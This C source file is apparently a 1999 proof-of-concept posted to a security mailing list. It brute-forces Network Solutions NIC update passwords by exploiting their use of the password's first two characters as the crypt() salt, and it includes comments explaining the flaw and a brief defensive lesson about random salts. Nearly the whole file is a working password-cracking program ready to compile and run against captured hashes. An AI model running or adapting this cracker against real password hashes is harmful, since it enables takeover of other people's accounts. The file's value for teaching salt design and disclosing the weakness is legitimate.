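/*
 * I couldn't resist doing a proof-of-concept, however I take no
 * responsibility for cracking your own password.  It takes a while to run
 * on fairly standard passwords.  Please don't bombard me with 'haX0r d00d'
 * requests, like the Frontpage thing.
 *
 * --Perry
 *
 * Compiles on RH6.0 with:
 *   gcc -O -funroll-loops -o nic_crack nic_crack.c -lcrypt
 */

/*
 * nic_crack.c - brute forces Netsol encrypted NIC update passwords
 *
 * Why this works (see the quoted message at the end of this file): the
 * first two characters of the crypt() output are the salt, and here they
 * are also the first two characters of the password.  The program copies
 * those two characters into both the salt and the start of the candidate
 * key, so only the six remaining key bytes are unknown.
 *
 * Defensive takeaway: a salt has to be chosen independently of the
 * password (randomly), otherwise the stored hash discloses part of the
 * secret and shrinks the search space.
 */
#define _XOPEN_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Candidate key, laid out so that the struct can be handed to crypt() as a
 * C string: two known bytes, six searched bytes, then a terminator.  All
 * members are char, so the compiler inserts no padding between them.
 */
struct key {
    char a[2];              /* known: copied from the salt */
    char b, c, d, e, f, g;  /* searched by the nested loops in main() */
    char term;              /* always '\0' */
};

/*
 * Usage: nic_crack <crypted password>
 *
 * Returns 0 when a match is printed or when the search space is exhausted
 * without a match, 1 on a usage error or when crypt() fails.
 */
int main(int argc, char *argv[])
{
    const char *passwd;
    const char *crypted;
    struct key thekey;
    char first[3];
    int b, c, d, e, f, g;

    if (argc < 2) {
        fprintf(stderr, "usage: nic_crack <crypted password>\n");
        exit(1);
    }

    passwd = argv[1];

    /* The salt is the first two characters; anything shorter has none. */
    if (strlen(passwd) < 2) {
        fprintf(stderr, "usage: nic_crack <crypted password>\n");
        exit(1);
    }

    thekey.term = '\0';

    /* The same two characters serve as salt and as the start of the key. */
    memcpy(first, passwd, 2);
    first[2] = '\0';
    memcpy(thekey.a, passwd, 2);

    /*
     * Each position runs over 0..126.  A zero byte ends the C string early,
     * so candidates shorter than eight characters are covered as well.
     */
    for (g = 0; g < 127; g++) {
        thekey.g = (char)g;
        for (f = 0; f < 127; f++) {
            thekey.f = (char)f;
            for (e = 0; e < 127; e++) {
                thekey.e = (char)e;
                for (d = 0; d < 127; d++) {
                    thekey.d = (char)d;
                    for (c = 0; c < 127; c++) {
                        thekey.c = (char)c;
                        for (b = 0; b < 127; b++) {
                            thekey.b = (char)b;
                            crypted = crypt((const char *)&thekey, first);
                            if (crypted == NULL) {
                                /*
                                 * crypt() can return NULL (for example on a
                                 * salt it rejects); strcmp() on NULL would
                                 * be undefined behaviour.
                                 */
                                perror("crypt");
                                return 1;
                            }
                            if (strcmp(crypted, passwd) == 0) {
                                printf("Found: %s\n", (const char *)&thekey);
                                return 0;
                            }
                        }
                    }
                }
            }
        }
    }

    return 0;
}

/*
 * Quoted text from the message this was a reply to:
 *
 * > through crypt(), but the first two characters of the encrypted value (the salt)
 * > are the same as the first two characters of the password, indicating they use
 * > the password as its own salt. This dramatically limits the usefulness of
 * >
 * > --
 * > Jefferson Ogata <jogataat_private> National Oceanographic Data Center
 * > You can't step into the same river twice. -- Herakleitos
 * >
 *
 * --
 * Perry Harrington        Director of          zelur xuniL ()
 * ................        System Architecture  Think Blue. /\
 */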